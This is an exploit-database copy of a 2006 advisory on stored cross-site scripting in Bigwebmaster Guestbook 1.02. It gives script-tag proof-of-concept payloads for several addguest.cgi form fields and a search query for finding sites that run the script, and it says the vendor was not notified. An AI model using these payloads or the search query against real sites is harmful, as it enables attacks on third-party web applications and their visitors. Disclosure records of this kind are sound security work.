Advertisement






bigwebmaster guestbook multiply XSS

CVE Category Price Severity
N/A CWE-79 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2006-05-12
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006050040

Below is a copy:

Affected software:
Bigwebmaster Guestbook version 1.02 and down
Vendor:
http://www.bigwebmaster.com/Perl/Scripts_and_Programs/Guestbooks/
Introduction:
(taken from vendor site)
This is one of the most powerful guestbooks that you will find on the
internet. Visitors who come to your site will be able to leave comments
and other general information about themselves. If you want to know what
your visitors are thinking, and if you want a fully customizable script,
this one is perfect for you. Features include template files to fit any
website design, 9 standard fields, 9 extra fields (customizable),
unlimited entries, and easy to use admin area. Full online demo available.

Vulnerability Details:
when adding a comment addguest.cgi accepts javascript code into
mail,site,city,state and country fields which lead to javascript cross
site scripting when viewguest.cgi is accessed for displaying the content
of the guest book.

POC:
http://www.example.com/gb/addguest.cgi
name: xss
mail: xss (at) example (dot) com [email concealed] <script>alert('XSS in mail');</script>
site: http://www.example.com/ <script>alert('XSS in site');</script>
city: <script>alert('XSS in city');</script>
state: <script>alert('XSS in state');</script>
country: <script>alert('XSS in country');</script>

google search:
intitle:Big Webmaster Guestbook

Vendor Status:
NOT NOTIFIED

Solution:
I DON'T CARE

Javor Ninov aka DrFrancky
http://www.securitydot.net/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (MingW32)

iD8DBQFEWiWDck4kcwaj+YIRApunAJ0Vz6d/OEVQNfuiyy3gVa7GwmyuVgCeOAs2
nHeXxQltIZL+kt8vgdOtCIM=
=HZqy
-----END PGP SIGNATURE-----

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.